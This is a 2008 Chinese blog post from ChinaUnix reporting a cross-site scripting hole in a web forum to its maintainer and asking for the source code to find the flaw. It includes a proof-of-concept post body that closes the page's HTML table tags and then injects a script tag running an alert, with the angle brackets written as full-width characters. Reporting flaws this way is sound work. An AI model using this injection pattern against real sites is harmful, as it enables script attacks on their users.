Chinaunix首页 | 论坛 | 博客
  • 博客访问: 845480
  • 博文数量: 756
  • 博客积分: 40000
  • 博客等级: 大将
  • 技术积分: 4980
  • 用 户 组: 普通用户
  • 注册时间: 2008-10-13 14:40
文章分类

全部博文(756)

文章存档

2011年(1)

2008年(755)

我的朋友

分类:

2008-10-13 14:41:57

to otto,我已经测试了,这个论坛的确有安全漏洞。

只要提交这样的帖子,就可以运行用户提交的任何JavaScript脚本。(为了正常显示,我用的是全角尖符号)
〈/FONT〉〈/TD〉〈/TR〉 〈TR〉〈TD bgColor=#f7f7f7 height=16 noWrap width=175〉〈/TD〉〈TD bgColor=#f7f7f7 height=16 vAlign=center width="100%"〉〈TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"〉〈TBODY〉〈TR vAlign=bottom〉〈TD〉〈/TD〉〈TD align=right noWrap〉〈/TD〉〈/TR〉〈/TBODY〉〈/TABLE〉〈/TD〉〈/TR〉〈/TBODY〉〈/TABLE〉〈/TD〉〈/TR〉〈/TBODY〉〈/TABLE〉〈!-- spacer --〉〈/TD〉〈TD width=10〉〈/TD〉〈/TR〉〈/TBODY〉〈/TABLE〉 〈SCRIPT language=JavaScript〉alert("Javascript is executed");〈/SCRIPT〉

其他详见我前面的帖子。因此建议otto改进代码,我觉得绿盟的论坛安全性不错。

bye the way,你有论坛的源代码吗,能email给我吗,我打算看看漏洞到底在哪?      
--------------------next---------------------

阅读(449) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~